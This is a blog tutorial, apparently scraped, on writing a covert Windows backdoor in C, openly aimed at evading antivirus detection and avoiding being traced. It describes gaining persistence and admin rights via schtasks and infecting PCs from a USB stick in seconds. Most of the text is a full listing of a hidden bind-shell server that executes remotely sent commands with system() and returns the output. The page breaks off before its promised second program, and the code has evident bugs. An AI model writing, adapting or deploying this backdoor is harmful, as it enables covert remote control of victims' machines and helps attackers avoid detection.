How to Program a C Backdoor (And Infect Any PC with an USB Key, and Three Seconds)
This How-To is aimed to anyone, with good C knowledge and who's tired of msfpayload backdoors that are often detected.
I) INTRODUCTION
- What's a backdoor ?
- What's an APT ?
1) Basic threat like raw msfpayloads (script-kiddies level)
2) Basic developpers ( for example using basic msfpayloads, and a "legitimate program", with a code Template)
3) APT which is the most Advanced level.
- What are we gonna do ?
II) GENERAL IDEA
- What do we want ?
We also want it PERSISTENT.
We'll also need to improve it.
Oh, and we also want to backdoor any PC just by plugging an USB stick and clicking on our installer, this must take less than 3 seconds
- How to do it ?
Sending forged packets ( port scanner, dos tool...)
Sniffing traffc (sniffers)
Client/Servers applications
So how to use sockets to program a backdoor ?
Well a backdoor is a Client or a Server.
Bind shell backdoors are servers : they bind to a local port and wait for incoming connections in order to provide a shell
Reverse shell backdoors are clients : they connect to a specified IP to provide a shell.
Reverse shells are widely uses as they're less "suspicious".
BUT when you use reverse backdoorrs, you need to specify YOUR IP. Unpleasant right ? Until you've got hacked servers or public IP, this will lead any tracker to your home.
That's why, we'll program a bind shell backdoor. So, if you protect your IP, you'll be less endangered.
BUT How to connect to our backdoor if we don't know what is its IP ? Or if its IP change ? That's why we'll also use a little hack to get the victim IP.
So it's kinda, "hey now i've got your adress : Knock Knock !!
- Make it persistent ?
BUT, this is not sufficient. We want ADMIN RIGHTS. So will use "schtasks" with an xml file to create a task at startup that will autp-launch our backdoor with admin rights.
- Get Victims IP ?
http://pastebin.com/g9R53Tri
This is a copy paste
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<winsock2.h>
#pragma comment(lib,"ws2_32.lib") //Winsock Library
int main(int argc, char *argv[])
{
HWND hWnd = GetConsoleWindow();
ShowWindow(hWnd, SW_MINIMIZE); //won't hide the window without SW_MINIMIZE
ShowWindow(hWnd, SW_HIDE);
backdoor();
return 0;
}
int backdoor()
{
WSADATA wsa;
SOCKET s, new_socket;
struct sockaddr_in server, client;
int c;
char *message, server_reply[100000];
int recv_size;
printf("\nInitialising Winsock...");
if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
{
printf("Failed. Error Code : %d", WSAGetLastError());
return 1;
}
printf("Initialised.\n");
//Create a socket
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
{
printf("Could not create socket : %d", WSAGetLastError());
}
printf("Socket created.\n");
//Prepare the sockaddr_in structure
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(8888);
//Bind
if (bind(s, (struct sockaddr *)&server, sizeof(server)) == SOCKET_ERROR)
{
printf("Bind failed with error code : %d", WSAGetLastError());
exit(EXIT_FAILURE);
}
puts("Bind done");
//Listen to incoming connections
listen(s, 3);
//Accept and incoming connection
puts("Waiting for incoming connections...");
c = sizeof(struct sockaddr_in);
FILE *fp2;
char ch;
int i = 0;
int clean_array = 0;
char array[10000];
char concat[11] = " > cmd.txt";
char error_message[100] = "\n !!! WRONG COMMAND !!!" ;
char chdir_message[100] = "\n Chdir to : ";
char chdir_success[100] = "\n Chdir success !\n";
int ret;
int chdir_flag;
while ((new_socket = accept(s, (struct sockaddr *)&client, &c)) != INVALID_SOCKET)
{
puts("Connection accepted");
int a = 1;
while (a == 1)
{
if ((recv_size = recv(new_socket, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR)
{
puts("recv failed");
}
else
{
printf("recv size : %d\n", recv_size);
server_reply[recv_size] = '\0';
printf("INPUT : %s\n", server_reply);
chdir_flag = strcmp(server_reply, "chdir");
printf(">>> %d <<<\n", chdir_flag);
if (chdir_flag == 0)
{
if (send(new_socket, chdir_message, strlen(chdir_message), 0) < 0)
{
puts("Send failed");
return 1;
}
if ((recv_size = recv(new_socket, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR)
{
puts("recv failed");
}
printf("CHDIR : %d\n", recv_size);
server_reply[recv_size] = '\0';
printf("INPUT : %s\n", server_reply);
chdir(server_reply);
printf("Chdir DONE !!!\n");
chdir_flag = 1;
if (send(new_socket, chdir_success, strlen(chdir_success), 0) < 0)
{
puts("Send failed");
return 1;
}
}
else
{
printf("Command output >>\n");
ret = system(server_reply);
printf("\n\n>>> %d <<<\n\n", ret);
i = 0;
if (ret == 0)
{
fp2 = fopen("cmd.txt", "r");
while ((ch = fgetc(fp2)) != EOF)
{
printf("%c", ch);
array[i] = ch;
i++;
}
array[i] = '\0';
remove(fp2);
fclose(fp2);
if (send(new_socket, array, strlen(array), 0) < 0)
{
puts("Send failed");
return 1;
}
for (i = 0; i < 10000; i++)
array[i] = '\0';
}
if (ret == 1)
send(new_socket, error_message, strlen(error_message), 0);
}
}
}
if (new_socket == INVALID_SOCKET)
{
printf("accept failed with error code : %d", WSAGetLastError());
return 1;
}
}
closesocket(s);
WSACleanup();
return 0;
}
END !
This is the servers/Backdoor code.
Then we'll use the followng C code (to be executed with ADMIN RIGHTS)
Aucun commentaire:
Enregistrer un commentaire